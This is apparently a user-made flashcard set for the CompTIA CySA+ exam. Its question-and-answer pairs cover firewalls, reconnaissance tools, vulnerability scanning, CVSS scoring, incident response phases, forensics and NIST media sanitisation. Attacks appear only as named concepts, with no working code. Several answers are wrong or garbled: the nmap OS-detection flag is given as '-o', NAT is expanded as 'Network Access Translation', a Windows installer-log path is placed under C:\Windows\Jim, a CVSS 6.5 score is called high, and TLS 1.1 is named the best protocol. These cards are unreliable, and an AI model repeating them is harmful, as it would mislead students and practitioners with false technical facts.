582 terms

CySA Exam

STUDY
PLAY

Terms in this set (...)

Which one of the following objectives is not one of the three main objectives that information security professionals must achieve to protect their organizations against cybersecurity threats?
nonrepudiation
Tommy is assessing the security database servers in his datacenter and realizes that one of them is missing a critical Oracle security patch. What type of situation has Tommy detected?
vulnerability
Ben is preparing to conduct a cybersecurity risk assessment for his organization. If he chooses to follow the standard process proposed by NIST, which one of the following steps would come first?
Identify threats
Cindy is conducting a cybersecurity risk assessment and is considering the impact that a failure of her city's power grid might have on the organization. What type of threat is she considering?
environmental
Which one of the following categories of threat requires that cybersecurity analysts consider the capability, intent and targeting of the threat source?
adversarial
Vincent is responding to a security incident that compromised one of his organization's web servers. He does not believe that the attackers modified or stole any information, but they did disrupt access to the organization's website. What cybersecurity objective did this attack violate?
availability
Which one of the following is an example of an operational security control?
penetration tests
Encryption software, network firewalls, and antivirus software are all examples of _________________ security controls.
technical
Paul recently completed a risk assessment and determined that his network was vulnerable to hackers connecting to open ports on servers. He implemented a network firewall to reduce the likelihood of a successful attack. What risk management strategy did Paul choose to pursue?
risk mitigation
Robert's organization has a BYOD policy, and he would like to ensure that devices connected to the network under this policy have current antivirus software. What technology can best assist him with this goal?
network access control
When performing 802.1x authentication, what protocol does the authenticator use to communicate with the authentication server?
RADIUS
Juan is configuring a new device that will join his organization's wireless network. The wireless network uses 802.1x authentication. What type of agent must be running on the device for it to join this network?
802.1x supplicant
Rick is preparing a firewall rule that will allow network traffic from external systems to a web server running the HTTPS protocol. What TCP port must he allow to pass through the firewall?
443
What type of firewall provides the greatest degree of contextual information and can include information about users and applications in its decision-making process?
Next Generation Firewalls
Wayne is configuring a jump box server that system administrators will connect to from their laptops. Which port should definitely not be open on the jump box?
23
Tom would like to deploy consistent security settings to all of his Windows settings simultaneously. What technology can he use to achieve this goal?
group policy object
During what phase of a penetration test should the testers obtain written authorization to conduct the test?
planning
Which step occurs first during the attack phase of a penetration test?
gaining access
Barry is participating in a cybersecurity wargame exercise. His role is to attempt to break into adversary systems. What team is he on?
red
Which one of the following techniques might be used to automatically detect and block malicious software that does not match known malware signatures?
sandboxing
Kevin would like to implement a specialized firewall that can protect against SQL injection, cross-site scripting, and similar attacks. What technology should he choose?
WAF
What method is used to replicate DNS information for DNS servers but is also a tempting exploit target for attackers?
zone transfers
____________ is a suite of DNS security specifications.
DNSSEC
What flag does nmap use to enable operating system identification?
-o
What command line tool can be used to determine the path that traffic takes to a remote system?
traceroute
Traceroute is a command-line tool that uses __________ to trace the route that a packet takes to a host.
ICMP
What type of data can frequently be gathered from images taken on smartphones?
EXIF
EXIF or Exchangeable Image Format data often includes ________________, allowing the images to be mapped and identified to a specific device or type of camera.
location and camera data
Which Cisco log level is the most critical?
0
Which Cisco log level is used for debugging information and is at the bottom of the scale?
7
During passive intelligence gathering, you are able to run netstat on a workstation located at your target's headquarters. What information would you not be able to find using netstat on a Windows system?
Active IPX connections
Active TCP connections and the executables that are associated with them, and route table information are all available via ____________.
Netstat
Which type of Windows log is most likely to contain information about a file being deleted?
security logs
What organization manages the global IP address space?
IANA
Before Ben sends a Word document, he uses the built-in Document Inspector to verify that the file does not contain hidden content. What is this process called?
metadata purging
What type of analysis is best suited to identify a previously unknown malware package operating on a compromised system?
heuristic analysis
Which of the following is not a common DNS anti-harvesting technique?
registering manually
CAPTCHAs, rate limiting, and blacklisting systems or networks that are gathering data are all common ___________ techniques.
anti-DNS harvesting
The __________ flag indicates a zone transfer in both the dig and host utilities.
axfr
Which of the following is not a reason that penetration testers often perform packet capture while conducting port and vulnerability scanning?
plausible deniability
A ____________ is often used to document work, including the time that a given scan or process occurred, and it can also be used to provide additional data for further analysis.
packet capture
What process uses information such as the way that a system's TCP stack responds to queries, what TCP options it supports, and the initial window size it uses?
OS detection
What tool would you use to capture IP traffic information to provide flow and volume information about a network?
netflow
__________ provides information about local connections, which applications have made them, and other useful local system information.
netstat
What method used to replicate DNS information between DNS servers can also be used to gather large amounts of information about an organization's systems?
zone transfer
Selah believes that an organization she is penetration testing may have exposed information about their systems on their website in the past. What site might help her find an older copy of their website?
The Internet Archive
During an information gathering exercise, Chris is asked to find out detailed personal information about his target's employees. What is frequently the best place to find this information?
social media
Which lookup tool provides information about a domain's registrar and physical location?
Whois
____________ will provide IP address or hostname information.
nslookup
__________ will provide IPv4 and IPv6 information as well as email service information.
host
___________ attempts to identify the path to a remote host as well as the systems along the route.
traceroute
What federal law requires the use of vulnerability scanning on information systems operated by federal government agencies?
FISMA
Gary is the system administrator for a federal agency and is responsible for a variety of information systems. Which systems must be covered by vulnerability scanning programs?
high-, moderate-, and low-impact systems
What tool can administrators use to help identify the systems present on a network prior to conducting vulnerability scans?
asset inventory
The asset inventory supplements automated tools with other information to detect systems present on a network. The asset inventory provides critical information for __________________.
vulnerability scans
Tonya is configuring vulnerability scans for a system that is subject to the PCI DSS compliance standard. What is the minimum frequency with which she must conduct scans?
quarterly
Which is not an example of a vulnerability scanning tool?
snort
QualysGuard, Nessus, and OpenVAS are all examples of ___________________.
vulnerability scanning tools
Bethany is the vulnerability management specialist for a large retail organization. She completed her last PCI DSS compliance scan in March. In April, the organization upgraded their point-of-sale system, and Bethany is preparing to conduct new scans. When must she complete the new scan?
immediately
Renee is configuring her vulnerability management solution to perform credentialed scans of servers on her network. What type of account should she provide to the scanners?
read only
Jason is writing a report about a potential security vulnerability in a software product and wishes to use standardized product names to ensure that other security analysts understand the report. Which SCAP component can Jason turn to for assistance?
common product enumeration
Common Product Enumeration (CPE) is a ________________ component that provides standardized nomenclature for product names and versions.
SCAP
Bill would like to run an internal vulnerability scan on a system for PCI DSS compliance purposes. Who is authorized to complete one of these scans?
any qualified individual
Which type of organization is the most likely to face a regulatory requirement to conduct vulnerability scans?
government agency
What minimum level of impact must a system have under FISMA before the organization is required to determine what information about the system is discoverable by adversaries?
high
What term describes an organization's willingness to tolerate risk in their computing environment?
risk appetite
If an organization is extremely ____________, it may choose to conduct scans more frequently to minimize the amount of time between when a vulnerability comes into existence and when it is detected by a scan.
risk averse
Which one of the following factors is least likely to impact vulnerability scanning schedules?
staff availability
Barry placed all of his organization's credit card processing systems on an isolated network dedicated to card processing. He has implemented appropriate segmentation controls to limit the scope of PCI DSS to those systems through the use of VLANs and firewalls. When Barry goes to conduct vulnerability scans for PCI DSS compliance purposes, what systems must he scan?
systems on the isolated network
Ryan is planning to conduct a vulnerability scan of a business critical system using dangerous plug-ins. What would be the best approach for the critical scan?
run the scan in a test environment
Which one of the following activities is not part of the vulnerability management life cycle?
reporting
Detection, remediation, and testing are the three life-cycle phases for ____________.
vulnerability management
What approach to vulnerability scanning incorporates information from agents running on the target servers?
continuous monitoring
Continuous monitoring incorporates data from agent-based approaches to vulnerability detection and reports security-related configuration changes to the _______________ platform as soon as they occur, providing the ability to analyze those changes for potential vulnerabilities.
vulnerability management
Brian is seeking to determine the appropriate impact categorization for a federal information system as he plans the vulnerability scanning controls for that system. After consulting management, he discovers that the system contains information that, if disclosed improperly, would have a serious adverse impact on the organization. How should this system be categorized?
moderate impact
Jessica is reading reports from vulnerability scans run by a different part of her organization using different products. She is responsible for assigning remediation resources and is having difficulty prioritizing issues from different sources. What SCAP component can help Jessica with this task?
CVSS
The Common Vulnerability Scoring Systems (CVSS) provides a standardized approach for measuring and describing the severity of ___________.
security vulnerabilities
Sarah would like to run an external vulnerability scan on a system for PCI DSS compliance purposes. Who is authorized to complete one of the scans?
an approved scanning vendor
Tom is reviewing a vulnerability scan report and finds that one of the servers on his network suffers from an internal IP address disclosure vulnerability. What protocol is likely in use on this network that resulted in this vulnerability?
Network Access Translation (NAT)
A network uses Network Access Translation (NAT) to map public and private IP addresses but a ______________ inadvertently discloses its private IP address to remote systems.
server
Which one of the CVSS metrics would contain information about the number of times that an attacker must successfully authenticate to execute an attack?
Authentication (Au)
The Authentication metric describes the authentication hurdles an attacker would need to clear to ___________ a vulnerability.
exploit
Which one of the following values for the CVSS access complexity metric would indicate that the specified attack is simplest to exploit?
low
A _____________ access complexity of "low" indicates that exploiting the vulnerability does not require any specialized conditions.
CVSS
Which one of the following values for the confidentiality, integrity, or availability CVSS metric would indicate the potential for total compromise of a system?
complete (C)
What is the most recent version of CVSS that is currently available?
3.0
Which one of the following metrics is not included in the calculation of CVSS exploitability score?
vulnerability age
The __________________ is computed using the access vector, access complexity, and authentication metrics.
CVSS exploitability score
Kevin recently identified a new security vulnerability and computed its CVSS base score as 6.5. Which risk would this vulnerability fall into?
high
__________________ with a CVSS score higher than 6.0 but less than 10.0 fall into the high risk category.
Vulnerabilities
Tara recently analyzed the results of a vulnerability scan report and found that a vulnerability reported by the scanner did not exist because the system was actually patched as specified. What type of error occurred.
false positive
Which one of the following is not a common source of information that may be correlated with vulnerability scan results?
database tables
Logs, SIEM reports, and configuration management systems are likely to contain information relevant to assessing a __________________.
vulnerability scan report
Which one of the following operating systems' support has been discontinued and should be avoided on production networks.
Windows Server 2003
In what type of attack does the attacker place more information in a memory location than is allocated for that use?
buffer overflow
The Dirty COW attack is an example of what type of vulnerability?
privilege escalation
In October 2016, security researchers announced the discovery of a Linux kernel vulnerability dubbed Dirty COW. This vulnerability, present in the Linux kernel for nine years, was extremely easy to exploit and provided successful attackers with __________________ of affected systems.
administrative control
Which protocol should never be used on a public network?
Telnet
Betty is selecting a transport encryption protocol for use in a new public website she is creating. What protocol would be the best choice?
TLS 1.1
Which one of the following conditions would not result in a certificate warning during a vulnerability scan of a web server?
inclusion of a public encryption key
__________________ are intended to provide public key encryptions and would not cause an error during a vulnerability scan of a web server: using an untrusted CA, certificate expiration, and mismatched certificate name would cause an error.
Digital certificates
What software component is responsible for enforcing the separation of guest systems in a virtualized infrastructure?
hypervisor
The __________________runs a special operating system known as a hypervisor that mediates access to the underlying hardware resources.
virtualized data center
In what type of attack does the attacker seek to gain access to resources assigned to a different virtual machine?
VM escape
__________________ are the most serious issue that can exist in a virtualized environment, particularly when a virtual host runs systems of differing security levels. In an escape attack, the attacker has access to a single virtual host and then manages to leverage that access to intrude on the resources assigned to a different virtual machine.
VM escape vulnerabilities
Which one of the following terms is not typically used to describe the connection of physical devices to a network?
Intrusion detection systems (IDS)
Intrusion detection systems (IDS) are a __________________ used to detect network or host attacks.
security control
The Internet of Things (IoT), supervisory control and data acquisition (SCADA) systems, and industrial control systems (ICS) are all associated with connecting __________________ to a network.
physical world objects
Monica discovers that an attacker posted a message in a web forum that she manages that is attacking users who visit the site. Which one of the following attack types is most likely to have occurred?
cross-site scripting (XSS)
In a __________________, an attacker embeds scripting commands on a website that will later be executed by an unsuspecting visitor accessing the site. The idea is to trick a user visiting a trusted site into executing malicious code placed there by an untrusted third party.
cross-site scripting (XSS) attack
Alan is reviewing web server logs after an attack and finds many records that contain semicolons and apostrophes in queries from end users. What type of attack should he suspect?
SQL injection
In an __________________, the attacker seeks to use a web application to gain access to an underlying database. Semicolons and apostrophes are characteristic of this attack.
SQL injection attack
Which one of the following is an example of a computer security incident?
former employee crashes a server
A user accessing a secure file and an administrator changing a file permission settings are examples of __________________ not security incidents.
security events
During what phase of the incident response process would an organization implement defenses designed to reduce the likelihood of a security event?
Preparation
Organizations should build solid, defense-in-depth approaches to cybersecurity during the preparation phase of the __________________. The controls built during this phase serve to reduce the likelihood and impact of future incidents.
incident response process
Alan is responsible for developing his organization's detection and analysis capabilities. He would like to purchase a system that can combine log records from multiple sources to detect potential security incidents. What type of system is best suited to meet Alan's security objective?
SIEM
A security information and event management (SIEM) system correlates log entries from multiple sources and attempts to identify potential __________________.
security incidents
Ben is working to classify the functional impact of an incident. The incident has disabled email service for approximately 30 percent of his organization's staff. How should Ben classify the functional impact of this incident according to the NIST scale?
medium
According to the NIST scale, the definition of medium functional impact is that the organization has lost the ability to provide a __________________ to a subset of system users.
critical service
According to the NIST scale, assigning a __________________ functional impact is only done when the organization can provide all critical services to all users at diminished efficiency.
low
According to the NIST scale, assigning a __________________ functional impact is only done if a critical service is not available to all users.
high
What phase of the incident response process would include measures designed to limit the damage caused by an ongoing breach?
containment, eradication, and recovery
The __________________ contained in the containment, eradication, and recovery phases are designed to limit the damage caused by an ongoing security incident.
containment protocols
Grace is the CSIRT team leader for a business unit within NASA, a federal agency. What is the minimum amount of time that Grace must retain incident handling records?
three years
Karen is responding to a security incident that resulted from an intruder stealing files from a government agency. Those files contained unencrypted information about protected critical infrastructure. How should Karen rate the information impact of this loss?
proprietary breach
In a proprietary breach, __________________ proprietary information is accessed or exfiltrated.
unclassified
__________________ is an example of unclassified proprietary information.
protected critical infrastructure information (PCII)
Matt is concerned about the fact that log records from his organization contain conflicting timestamps due to unsynchronized clocks. What protocol can he use to synchronize clocks throughout the enterprise?
network time protocol (NTP)
Which one of the following document types would outline the authority of a CSIRT responding to a security incident?
policy
An organization's __________________ should contain a clear description of the authority assigned to the CSIRT while responding to an active security incident.
incident response policy
A cross-site scripting attack is an example of what type of threat vector?
web
A __________________ is an attack executed from a website or web-based application.
web attack
A cross-site scripting (XSS) attack is used to steal credentials or redirect to a site that exploits a browser vulnerability and installs __________________.
malware
Which one of the following parties is not commonly the target of external communications during an incident?
the perpetrator
__________________ members do not normally communicate directly with the perpetrator of a cybersecurity incident.
CSIRT
Robert is finishing a draft of a proposed incident response policy for his organization. Who would be the most appropriate person to sign the policy?
CEO
The __________________ provides the CSIRT with the authority needed to do their job. Therefore, it should be approved by the highest possible level of authority within the organization, preferably the CEO.
incident response policy
Which one of the following is not an objective of the containment, eradication, and recovery phase of incident response?
detect an incident in progress
Implementing a containment strategy, identifying the attackers, and eradicating the effects of an incident are all objectives of the __________________ of incident response.
containment, eradication and recovery phase
Renee is responding to a security incident that resulted in the unavailability of a website critical to her company's operations. She is unsure of the amount of time and effort that it will take to recover the website. How should Renee classify the recoverability effort?
extended
__________________effort occurs when the time to recovery is unpredictable. In those cases, additional resources and outside help are typically needed.
extended recoverability
Which one of the following is an example of an attrition attack?
brute-force password attack
An __________________ attack employs brute-force methods to compromise, degrade, or destroy systems, networks, or services - for example, a DDoS attack intended to impair or deny access to a service or application or a brute-force attack against an authentication mechanism.
attrition attack
Who is the best facilitator for a post-incident lessons-learned session?
independent facilitator
__________________ sessions are most effective when facilitated by an independent party who was not involved in the incident response effort.
Lessons-learned
Which one of the following elements is not normally found in an incident response policy?
procedures for rebuilding systems
Procedures for rebuilding systems are highly technical and would normally be included in a playbook or procedure document rather than an __________________.
incident response policy
A man-in-the-middle attack is an example of what type of threat vector?
impersonation
An __________________ involves the replacement of something benign with something malicious - for example, spoofing, man-in-the-middle attacks, rogue wireless access points, and SQL injection attacks.
impersonation attack
Tommy is the CSIRT team leader for his organization and is responding to a newly discovered security incident. What document is most likely to contain step-by-step instructions that he might follow in the early hours of the response effort?
playbook
__________________ playbooks contain detailed step-by-step instructions that guide the early response to a cybersecurity incident.
incident response
Organizations typically have __________________ for high-severity and frequently occurring incident types.
playbooks
Hank is responding to a security event where the CEO of his company had her laptop stolen. The laptop was encrypted but contained sensitive information about the company's employees. How should Hank classify the information impact of this security event?
none
An encrypted laptop containing sensitive information about company's employees would not qualify as a __________________ with measurable information impact, because encryption was used to protect the contents of the laptop.
security incident
A __________________ determines which clients may access a wired or wireless network.
NAC
A __________________ creates a unique fingerprint of a file.
hash
A __________________ filters network connections based upon source, destination, and port.
firewall
A __________________ system intentionally created to appear vulnerable.
honeypot
A __________________ attempts to recover source code from binary code.
decompiler
An __________________ scans a system for malicious software.
antivirus
A __________________ protects against SQL injection attacks.
WAF
A __________________ deploys configuration settings to multiple Windows systems.
GPO
__________________is a route to a system.
Traceroute
__________________ opens services via a network.
Nmap
__________________ monitors IP traffic flow and volume.
Netflow
__________________ provides organizational contact information associated with domain registration.
Whois
__________________ identifies connections listed by protocol.
Netstat
__________________ identified zone transfer.
Dig
__________________ is used for packet capture.
Wireshark
__________________ is used for social media geotagging.
Creepy
In CVSS2#AV:N/AC:L/Au:N/C:P:/I:N/A:N, __________________ indicates that an attacker may exploit the vulnerability remotely over a network. This is the most serious value for this metric.
AV:N
In CVSS2#AV:N/AC:L/Au:N/C:P:/I:N/A:N, __________________ indicates that exploiting the vulnerability does not require any specialized conditions. This is the most serious value for this metric.
AC:L
In CVSS2#AV:N/AC:L/Au:N/C:P:/I:N/A:N, __________________ indicates that attackers do not need to authenticate to exploit the vulnerability. This is the most serious value for this metric.
Au:N
In CVSS2#AV:N/AC:L/Au:N/C:P:/I:N/A:N, __________________ indicates that a successful exploitation of this vulnerability would yield partial access to information. This is the middle value for this metric.
C:P
In CVSS2#AV:N/AC:L/Au:N/C:P:/I:N/A:N, __________________ indicates that a successful exploitation of this vulnerability would have no integrity impact. This is the least serious value for this metric.
I:N
In CVSS2#AV:N/AC:L/Au:N/C:P:/I:N/A:N, __________________indicates that a successful exploitation of this vulnerability would have no availability impact. This is the least serious value for this metric.
A:N
A CVSS vector rating of __________________ indicates that exploiting the vulnerability requires somewhat specialized conditions. This is the middle value for this metric.
AC:M
In the CVSS vector rating, AV stands for:
access vector
In the CVSS vector rating, AC stands for:
access complexity
In the CVSS vector rating, Au stands for:
authentication
In the CVSS vector rating, C stands for:
confidentiality
In the CVSS vector rating, I stands for:
integrity
In the CVSS vector rating, A stands for:
availability
Conducting a lessons-learned review session would occur in the __________________ incident response phase.
post-incident activity
Receiving a report from a staff member about a malware infection would occur in the __________________ incident response phase.
detection and analysis
Upgrading the organization's firewall to block a new type of attack would occur in the __________________ incident response phase.
preparation
Recovering normal operations after eradicting an incident would occur in the __________________ incident response phase.
containment, eradication, and recovery
Identifying the attacker(s) and attacking system(s) would occur in the __________________ incident response phase.
containment, eradication, and recovery
Interpreting log entries using a SIEM to identify a potential incident would occur in the __________________ incident response phase.
detection and analysis
Assembling the hardware and software required to conduct an incident investigation would occur in the __________________ incident response phase.
preparation
__________________ are a set of packets passing from a source system to a destination system in a given time interval.
flows
__________________ is a Windows tool that monitors memory, CPU, and disk usage.
Resmon
__________________ is a tool for testing the maximum available bandwidth for a network.
iPerf
__________________ is a network management and monitoring tool that provides central visibility into flows and SNMP data for an entire network.
PRTG
__________________ is traffic sent to a command and control system by a PC that is part of a botnet.
beaconing
__________________ is a protocol for collecting information like status and performance about devices on a network.
SNMP
__________________ is a Linux command that displays processes, memory utilization, and other details about running programs.
top
__________________ is a Windows tool that monitors a wide range of devices and services, including energy, USB, and disk usage.
Perfmon
__________________ is a Linux tool used to create disk images.
dd
__________________ is used to determine whether a drive is forensically sound.
md5sum
__________________ is a memory forensics and analysis suite.
Volatility Framework
__________________ is a full-featured forensic suite.
FTK
__________________ is a drive and file wiping utility sometimes used for anti-forensic purposes.
eraser
__________________ is a device used to prevent forensic software from modifying a drive while accessing it.
write blocker
__________________ is a tool used to review Windows memory dumps.
WinDBG
__________________ is a device used to create a complete forensic image and validate without a PC.
forensic drive duplicator
In Incident Response, which CompTIA category would you assign patching?
validation
In Incident Response, which CompTIA category would you assign sanitization?
eradication
In Incident Response, which CompTIA category would you assign lessons learned?
post-incident activities
In Incident Response, which CompTIA category would you assign reimaging?
eradication
In Incident Response, which CompTIA category would you assign secure disposal?
eradication
In Incident Response, which CompTIA category would you assign isolation?
containment
In Incident Response, which CompTIA category would you assign scanning?
validation
In Incident Response, which CompTIA category would you assign removal?
containment
In Incident Response, which CompTIA category would you assign reconstruction?
eradication
In Incident Response, which CompTIA category would you assign permission verification?
validation
In Incident Response, which CompTIA category would you assign user account review?
validation
In Incident Response, which CompTIA category would you assign segmentation?
containment
In Policy, what outlines a step-by-step process for carrying out a cybersecurity activity?
procedure
In Policy, what includes advice based on best practices for achieving security goals that are not mandatory?
guidelines
In Policy, what provides high-level requirements for a cybersecurity program?
policy
In Policy, what offers detailed requirements for achieving security control objectives?
standard
In Security Architecture, _____________ is a security design that protects all elements of the environment at the same level using the same tools and techniques.
uniform protection
In Security Architecture, _____________ is the portion of an organization, system, or network that can be attacked.
attack surface
In Security Architecture, _____________ are controls that include processes and policies.
administrative controls
In Security Architecture, _____________ are a protected network or location separated from other security zones by protective controls.
protected enclaves
In Security Architecture, _____________ is a security control that prevents individuals from performing sensitive actions without a trusted peer reviewing and approving their actions.
dual control
In Security Architecture, _____________ is a part of a system that, if it fails, will cause the failure of the entire system.
single point of failure
In Security Architecture, _____________ is a personnel security control that can help to identify individuals who are exploiting the rights they have as part of their job.
mandatory vacation
In Security Architecture, _____________ is a control that remediates a gap or flaw in another control.
compensating control
In Identity and Access Management, __________ is a Cisco-designed authentication protocol.
TACACs+
In Identity and Access Management, __________ is the set of claims made about an account holder.
identity
In Identity and Access Management, __________ is Microsoft's identity federation system.
ADFS
In Identity and Access Management, __________ is an issue that occurs when accounts gain more rights over time due to role changes.
privilege creep
In Identity and Access Management, __________ is where LDAP is deployed in this role.
directory service
In Identity and Access Management, __________ is an open standard for authorization used for websites and applications.
OAuth 2.0
In Identity and Access Management, __________ is an XML-based protocol used to exchange authentication and authorization data.
SAML
In Identity and Access Management, __________ is a common AAA system for network devices.
RADIUS
In Security Tools, __________ is a source control management tool.
subversion
In Security Tools, __________ is an SDLC model that relies on sprints to accomplish tasks based on user stories.
Agile
In Security Tools, __________ is a code analysis that is done using a running application.
dynamic code analysis
In Security Tools, __________ is a code analysis done using a running application that relies on sending unexpected data to see if the application fails.
fuzzing
In Security Tools, __________ is a formal code review process that relies on specified entry and exit criteria for each phase.
Fagan inspection
In Security Tools, __________ is a code review process that requires one developer to explain their code to another developer.
over the shoulder
In Security Tools, __________ is the first SDLC model, replaced in many organizations but still used for very complex systems.
waterfall
In Security Tools, __________ is an Agile term that describes the list of features needed to complete a project.
backlog
Which format does dd produce files in?
RAW
Files remnants found in clusters that have been only partially rewritten by new files are found in what type of space?
slack
Mike is looking for information about files that were changed on a Windows system. Which of the following is least likely to contain useful information for his investigation?
event logs
The __________ contain specific information about files.
Master File Table (MFT) and file indexes (INDX files)
__________ help show differences between files and locations at a point in time.
Volume shadow copies
Alice wants to copy a drive without any chance of it being modified by the copying process. What type of device should she use to ensure that this does not happen?
a write blocker
__________ ensure that no changes are made to a source drive when creating a forensic copy.
write blockers
Frederick wants to determine if a thumb drive was ever plugged into a Windows system. How can he test for this?
use the USB Historian
A __________ provides a list of devices that logged in the Windows Registry.
USB Historian
What two files may contain encryption keys normally stored only in memory on a Window system?
core dumps and hibernation files
Core dumps and hibernation files both contain an image of the live memory of a system, potentially allowing __________ to be retrieved from the stored file.
encryption keys
The __________ provides information about file layout.
Master File Table (MFT)
The __________ contains system information.
Registry
Jeff is investigating a system compromise and knows that the first event was reported on October 5th. What forensic tool capability should he use to map other events found in logs and files to this date?
a timeline
Timelines are one of the most useful tools when conducting an investigation of a compromise or other event. __________ provide built-in timeline capabilities to allow this type of analysis.
Forensic tools
To verify that the original disk has not changed, run __________ prior to and after the cloning process.
MD5sum
Jennifer wants to perform memory analysis and forensics for Windows, macOS , and Linux systems. Which of the following best suits her needs?
The Volatility Framework
LiME and fmem are __________ used to perform memory analysis and forensics.
Linux tools
__________ is a Windows-only tool, used to perform memory analysis and forensics.
DumpIt
Alex is conducting a forensic examination of a Windows system and wants to determine if an application was installed. Where can he find the Windows installer log files for a user named Jim?
C:\Windows\Jim\AppData\Local\Temp
__________ are typically kept in the user's temporary app data folder.
Windows Installer logs
Kathleen needs to find data contained in memory but only has an image of an offline Windows system. Where does she have the best chance of recovering the information she needs?
%SystemRoot%\MEMORY.DMP
__________ are stored in %SystemRoot%\MEMORY.DMP and contain the memory state of the system when the system crash occurred.
Windows crash dumps
__________ is a Windows debugger.
WinDbg
Carl does not have the ability to capture data from a cell phone using forensic or imaging software, and the phone does not have removeable storage. Fortunately, the phone was not set up with a PIN or screen lock. What is his best option to ensure he can see email and other data stored there?
manual access
Manual access is used when phones cannot be __________ or accessed as a volume or filesystem. Manual access requires that the phone be reviewed by hand, with pictures and notes preserved to document the contents of the phone.
forensically imaged
What forensic issue might the presence of a program like CCleaner indicate?
anti-forensic activities
__________ is a PC cleanup utility that wipes Internet history, destroys cookies and other cashed data, and can impeded forensic investigations.
CCleaner
Which of the following is not a potential issue with live imaging of a system?
unallocated space will be captured
Unallocated space is typically not captured during a __________, potentially resulting in data being missed.
live image
Remnant data from the tool, memory and drive contents changing while the image is occurring, and malware detecting the tool are all possible issues that may occur when __________ a system.
live imaging
During his investigation, Jeff, a certified forensic examiner, is provided with a drive image created by an IT staff member and is asked to add it to his forensic case. What is the most important issue Jeff could encounter if the case goes to court?
inability to certify chain of custody
Susan has been asked to identify the applications that start when a Windows system does. Where should she look first?
the Registry
Windows stores information about programs that run when Windows starts in the Registry as __________ Registry keys, which run each time a user logs in.
Run and RunOnce
During a forensic investigation Ben asks Chris to sit with him and to sign off on the actions he has taken. What is he doing?
maintaining chain of custody
While maintaining chain of custody, one person acts as a __________ to the process for the actions another person is taking.
validator and witness
Which tool is not commonly used to generate the hash of a forensic copy? AES
...
MD5, SHA1, and built-in hashing tools in FTK and other commercial tools are commonly used for creating __________.
forensic hashes
Which of the following Linux command-line tools will show you how much disk space is in use?
df
In Linux command-line tools, __________ tools will show you information about processes, CPU, and memory utilization.
top and ps
In Linux command-line tools, __________ is a multifunction tool for listing open files.
lsof
Which one of the phases of incident response involves primarily active undertakings designed to limit the damage that an attacker might cause?
containment, eradication, and recovery
The containment, eradication, and recovery phase of __________ includes active undertakings designed to minimize the damage caused by the incident and restore normal operations as quickly as possible.
incident response
Which one of the following criteria is not normally used when evaluating the appropriateness of a cybersecurity incident containment strategy?
log records generated by the strategy
NIST recommends using six criteria to __________ a containment strategy: the potential damage to resources, the need for evidence preservation, service availability, time and resources required (including cost), effectiveness of the strategy, and duration of the solution.
evaluate
Which choice is one of the six criteria NIST recommends to evaluate a containment strategy?
the potential damage to resources
Which choice is one of the six criteria NIST recommends to evaluate a containment strategy?
the need for evidence preservation
Which choice is one of the six criteria NIST recommends to evaluate a containment strategy?
service availability
Which choice is one of the six criteria NIST recommends to evaluate a containment strategy?
time and resources required (including cost)
Which choice is one of the six criteria NIST recommends to evaluate a containment strategy?
effectiveness of the strategy
Which choice is one of the six criteria NIST recommends to evaluate a containment strategy?
duration of the solution
Alice is responding to a cybersecurity incident and notices a system that she suspects is compromised. She places this system on a quarantine VLAN with limited access to other networked systems. What containment strategy is Alice pursuing?
segmentation
Alice confers with other team members and decides that even allowing limited access to other systems is an unacceptable risk and decides instead to prevent the quarantine VLAN from accessing any other systems by putting firewall rules in place that limit access to other enterprise systems. The attacker can still control the system to allow Alice to continue monitoring the incident. What strategy is she pursuing?
isolation
After observing the attacker, Alice decides to remove the Internet connection entirely, leaving the systems running but inaccessible from outside the quarantine VLAN. What strategy is she pursuing?
removal
What tool may be used to isolate an attacker so that they may not cause damage to production systems but may still be observed by cybersecurity analysts?
sandbox
Tamara is a cybersecurity analyst for a private business that is suffering a security breach. She believes the attackers have compromised a database containing sensitive information. Which one of the following activities should be Tamara's first priority?
containment
Which one of the following activities does CompTIA classify as part of the recovery validation effort?
scanning
CompTIA includes ____________________ in the set of validation activities that cybersecurity analysts should undertake in the aftermath of a security incident.
patching
CompTIA includes ____________________ in the set of validation activities that cybersecurity analysts should undertake in the aftermath of a security incident.
permissions
CompTIA includes ____________________ in the set of validation activities that cybersecurity analysts should undertake in the aftermath of a security incident.
security scanning
CompTIA includes ____________________ in the set of validation activities that cybersecurity analysts should undertake in the aftermath of a security incident.
verifying logging/communication to monitoring
Which one of the following pieces of information is most critical to conducting a solid incident recovery effort?
root cause of the attack
Understanding the root cause of an attack is critical to the ____________________. Analysts should examine all available information to help reconstruct the attackers' actions. This information is crucial to remediating security controls and preventing future similar attacks.
incident recovery effort
Lynda is disposing of a drive containing sensitive information that was collected during the response to a cybersecurity incident. The information is categorized as a high security risk and she wishes to reuse the media during a future incident. What is the appropriate disposition for this information?
purge
In the NIST Guidelines for Media Sanitation, ____________________ applies logical techniques to sanitize data in all user-addressable storage locations for protection against simple non-invasive data recovery techniques.
clear
In the NIST Guidelines for Media Sanitation, ____________________ applies physical or logical techniques that render target data recovery infeasible using state-of-the-art laboratory techniques.
purge
In the NIST Guidelines for Media Sanitation, ____________________ renders data recover infeasible using state-of-the-art laboratory techniques and results in the subsequent inability to use the media for storage of data.
destroy
In the NIST Guidelines for Media Sanitation, an example of clearing is typically applied through: ______________.
rewriting with a new value or using a menu option to reset the device to the factory state
In the NIST Guidelines for Media Sanitation, an example of purging includes: __________________.
Degaussing, overwriting, block erase, and cryptographic erase activities when performed through the use of dedicated, standardized device commands
In the NIST Guidelines for Media Sanitation, an example of destroying includes____________________.
disintegration, pulverization, melting, and incinerating
In the NIST Guidelines for Media Sanitation, if the security categorization is low and it is not leaving the organization's control, it can be ____________________.
cleared then validated
In the NIST Guidelines for Media Sanitation, if the security categorization is low and it is leaving the organization's control, it should be ____________________.
purged then validated
In the NIST Guidelines for Media Sanitation, if the security categorization is moderate and the media will not be reused, it should be ____________________.
destroyed then validated
In the NIST Guidelines for Media Sanitation, if the security categorization is moderate and the media will be reused AND is not leaving the organization's control, it should be ____________________.
cleared then validated
In the NIST Guidelines for Media Sanitation, if the security categorization is moderate and the media will be reused AND is leaving the organization's control, it should be ____________________.
purged then validated
In the NIST Guidelines for Media Sanitation, if the security categorization is high and the media will not be reused, it should be ____________________.
destroyed then validated
In the NIST Guidelines for Media Sanitation, if the security categorization is high and the media will be reused AND is not leaving the organization's control, it should be ____________________.
purged then validated
In the NIST Guidelines for Media Sanitation, if the security categorization is high and the media will be reused AND is leaving the organization's control, it should be ____________________.
destroyed then validated
Which one of the following activities is not normally conducted during the recovery validation phase?
implement new firewall rules
New firewall rules, if required, would be implemented during the ______________.
eradication and recovery phase
The ______________ includes verifying accounts and permissions, verifying the logging is working properly, and conducting vulnerability scans.
validation phase
